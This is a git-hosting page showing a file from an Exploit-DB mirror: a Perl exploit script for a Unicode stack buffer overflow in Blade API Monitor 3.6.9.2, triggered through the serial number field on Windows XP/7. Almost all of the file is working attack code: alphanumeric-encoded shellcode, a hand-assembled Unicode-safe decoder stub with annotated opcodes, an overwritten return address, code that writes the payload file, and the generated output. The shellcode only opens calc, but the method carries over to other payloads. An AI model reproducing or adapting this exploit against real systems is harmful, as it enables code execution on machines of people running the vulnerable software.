bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/local/18349.pl
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

147 lines
No EOL
11 KiB
Perl
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Blade API Monitor Unicode Stack Buffer Overflow (the serial number!!)
# Date: 25/12/2011
# Author: FullMetalFouad
# Version: 3.6.9.2
# Tested on: Windows XP/7
################################################################
my $file= "bof_blade.txt";
# windows/Winexec - 178 bytes
# VERBOSE=false, EXITFUNC=process, CMD=calc encoder=Alpha3
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\calc.txt" --verbose
my $shellcode_calc =
"hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J".
"0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I".
"2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W".
"0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p".
"034r032m334t3w3m02";
#
# first stage to prepare the $shellcode_calc execution :
# ALPHA3\ALPHA3.py x86 ascii mixedcase eax --input="C:\calc_shellcode\shellcode.txt" --verbose
# "\x05\xF6\xFC\xFF\xFF" ;# sub eax, 30A
# "\x33\xDB" ;# xor ebx,ebx
# "\x33\xC9" ;# xor ecx,ecx
# "\xFE\xC5" ;# inc ch
#
# "\x43" ;# inc ebx
# "\x8A\x14\x58" ;# mov dl, [eax+ebx*2]
# "\x88\x14\x18" ;# mov [eax+ebx], dl
# "\xE2\xF7" ;# loop
# "\xFF\xE0" ;# jmp eax
my $shellcode = "hffffk4diFkTpk02Tpl0T0Bu".
"EE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0m";
my $junk1 = "\xCC" x 104;
$junk1 = $junk1 ."\x35" x 2; # ECX
$junk1 = $junk1 ."\x41" x 6; # EBP
my $eip = "\x3e\x43"; # 0x0043003e : call ebx | startnull,unicode,asciiprint,ascii {PAGE_EXECUTE_READ} [BladeAPIMonitor.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.6.9.2 (C:\Program Files\BladeAPIMonitor\BladeAPIMonitor.exe)
my $junk2 = "\x42" x 20;
my $buffer = "\x41" x 246;
my $finder = "";
my $part0 = "";
my $part1 = "";
my $part2 = "";
my $part3 = "";
# 0 part : we do EAX = EBX + length(part0+part1+part2 +1 ), to point to the first null byte of the loop code.
# _part_0_:__________________________________________________
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xBA\x58\x58"; # | BA00580058 mov edx, 58005800 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5F"; # | 5F pop edi |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xB9\x3B\x3B"; # | B9003B003B mov ecx, 3B003B00 (diff) |
$part0 = $part0. "\xF5"; # | 00F5 add ch,dh |
$part0 = $part0. "\x6F"; # | 006F00 add [edi+0x0],ch |
$part0 = $part0. "\xD6"; # | D6 salc |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x5B"; # | 5B pop ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x50"; # | 50 push eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x54"; # | 54 push esp |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\xC1\x19"; # | C10019 rol dword ptr [eax], 19 |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\xC7"; # | 00C7 add bh,al |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x53"; # | 53 push ebx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x58"; # | 58 pop eax |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part0 = $part0. "\x52"; # | 52 push edx |
$part0 = $part0. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
##################################### |__________________________________________________________|
# 1st part : we do EBX=0x00000000, and ECX=0x00000100 (approximative size of buffer)
# _part_1_:__________________________________________________
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x6A"; # | 6A00 push dword 0x00000000 |
$part1 = $part1. "\x5B"; # | 5B pop ebx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\x59"; # | 59 pop ecx |
$part1 = $part1. "\x45"; # | 004500 add [ebp+0x0],al (nop) |
$part1 = $part1. "\xBA\x01\x41"; # | BA00010041 mov edx,0x41000100 |
$part1 = $part1. "\xF5"; # | 00F5 add ch,dh |
##################################### |__________________________________________________________|
# 2nd part : The patching of the 'loop code' :
# _part_2_:__________________________________________________
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x5A"; # | 5A pop edx |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x32"; # | C60032 mov byte [eax],0x32 ; 0x8A-0x58 |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x70"; # | 007000 add [eax+0x0],dh ; 0x88 dh=58 |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\x14"; # | C60014 mov byte [eax],0x14 ; 0x14 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\xC6\xE2"; # | C600E2 mov byte [eax],0xE2 ; 0xE2 |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
$part2 = $part2. "\x40"; # | 40 inc eax |
$part2 = $part2. "\x45"; # | 004500 add [ebp+0x0],al |
# |__________________________________________________________|
# 3rd part : The loop code (stuffed with nulls of course)
# _part_3_:___________________________________________________
# | ; eax points to our shellcode |
# | ; ebx is 0x00000000 |
# | ; ecx is 0x00000500 (for example) |
# | |
# | label: |
$part3 = $part3. "\x43"; # | 43 inc ebx |
$part3 = $part3. "\x14"; # | 8A1458 mov byte dl,[eax+2*ebx] |
$part3 = $part3. "\x30\x18"; # | 881418 mov byte [eax+ebx],dl |
$part3 = $part3. "\xF7"; # | E2F7 loop label |
# |__________________________________________________________|
$finder = $part0.$part1.$part2.$part3;
open($FILE,">$file");
print $FILE $shellcode_calc.$junk1.$eip.$junk2.$finder.$shellcode."\xFF\xFF\xFF\xFF".$buffer."\x43\x43\x43\x43";
close($FILE);
print "File Created successfully\n";
# output: hffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCChffffk4diFkTpj02Tpk0T0AuEE0t3r2F1k2q0S2J0R3r3D2C0f074y08103I0E1N4x027n8n5K0V5K0I2L3b0o144z0l2L015K012N0n054F5K1N2H0J094W0w3v4q0j027L0Y2G0w093V0m4G7k1P3Z5O2n2O0p034r032m334t3w3m02ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ55AAAAAA>CBBBBBBBBBBBBBBBBBBBBSEºXXETE_E¹;;õoÖE[EPETEXEÁEXÇESEXEREjj[EYEºAõEZEÆ2p@E@p@p@EÆE@E@EÆâE@EC0÷hffffk4diFkTpk02Tpl0T0BuEE1p3W4L8L38174W2k4E8M3m0r5M7p2o4z1O2L378O4r3C0mÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACCCC
Reference in a new issue View git blame Copy permalink